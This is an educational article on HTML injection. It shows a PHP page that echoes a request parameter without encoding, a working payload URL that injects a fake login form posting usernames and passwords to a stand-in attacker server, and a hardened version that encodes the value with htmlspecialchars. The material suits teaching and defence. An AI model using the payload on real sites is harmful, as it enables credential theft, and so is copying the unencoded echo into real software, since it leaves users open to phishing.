Hypertext Markup Language (HTML) injection, also sometimes referred to as virtual defacement, is an attack on a user made possible by an injection vulnerability in a web application. When an application does not properly handle user-supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page.
This attack is typically used in conjunction with some form of social engineering, as it exploits both a code-based vulnerability and the user's trust in the site.
HTML Injection vs. Cross-site Scripting
A possible attack scenario is demonstrated below:
- Attacker discovers injection vulnerability and decides to use an HTML injection attack
- Attacker crafts a malicious link, including the injected HTML content, and sends it to a user via email
- The user visits the page due to the page being located within a trusted domain
- The attacker's injected HTML is rendered and presented to the user asking for a username and password
- The user enters a username and password, which are both sent to the attacker's server
A simple PHP page containing an injection vulnerability via the name parameter (the value is echoed into the page without any output encoding):

```php
<?php
// Untrusted request data is read and later echoed unencoded: this is the bug.
$name = $_REQUEST['name'];
?>
<html>
<body>
<h1>Welcome to the Internet!</h1>
<br>
Hello, <?php echo $name; ?>!
<p>We are so glad you are here!</p>
</body>
</html>
```
The page functionality can be tested by making the following GET request to the page:
By requesting the link below, the page renders the injected HTML, presents a login form, and comments out the rest of the page after the injection point. Once a user enters their username and password, the values are sent to a page named login.php on the attacker's server via POST.
http://127.0.0.1/vulnerable.php?name=<h3>Please Enter Your Username and Password to Proceed:</h3><form method="POST" action="http://attackerserver/login.php">Username: <input type="text" name="username" /><br />Password: <input type="password" name="password" /><br /><input type="submit" value="Login" /></form><!--
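The fix for the page above is to encode the untrusted value for the HTML text context it lands in. The following is an added example, not code from the original page: it puts the vulnerable rendering beside a hardened one and runs both on a constructed input shaped like the page's payload (a tag followed by an unterminated comment). The function names are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Vulnerable rendering: the untrusted value is concatenated into the page unchanged,
// exactly like the echo in the page above.
function render_unsafe(string $name): string
{
    return "<html><body><h1>Welcome to the Internet!</h1>"
        . "Hello, " . $name . "!"
        . "<p>We are so glad you are here!</p></body></html>";
}

// Hardened rendering: encode &, <, >, " and ' so the browser treats the value as text.
// ENT_QUOTES covers both quote styles, ENT_SUBSTITUTE avoids returning an empty string
// on malformed UTF-8, and the charset must match the one the page is served with.
// This encoding is correct for HTML text content only; attribute, URL and JavaScript
// contexts need their own encoders.
function render_safe(string $name): string
{
    $encoded = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
    return "<html><body><h1>Welcome to the Internet!</h1>"
        . "Hello, " . $encoded . "!"
        . "<p>We are so glad you are here!</p></body></html>";
}

// Constructed sample input (not from a real request): a heading plus an opening
// comment marker, which in the vulnerable output hides everything after it.
$payload = '<h3>Please sign in</h3><!--';

$unsafe = render_unsafe($payload);
$safe   = render_safe($payload);

// Checks a reviewer would make: in the unsafe output the markup is live and the
// closing paragraph has been swallowed by the comment; in the safe output the
// same characters survive only in their encoded form.
$unsafe_has_live_tag = str_contains($unsafe, '<h3>');
$safe_has_live_tag   = str_contains($safe, '<h3>');
$safe_is_encoded     = str_contains($safe, '&lt;h3&gt;') && str_contains($safe, '&lt;!--');

echo "unsafe output:\n", $unsafe, "\n\n";
echo "safe output:\n", $safe, "\n\n";
echo "unsafe contains live <h3>: ", var_export($unsafe_has_live_tag, true), "\n";
echo "safe contains live <h3>:   ", var_export($safe_has_live_tag, true), "\n";
echo "safe output is encoded:    ", var_export($safe_is_encoded, true), "\n";
```

Run it with `php example.php`; the hardened output renders the whole page, including the closing paragraph, with the injected text shown literally to the user.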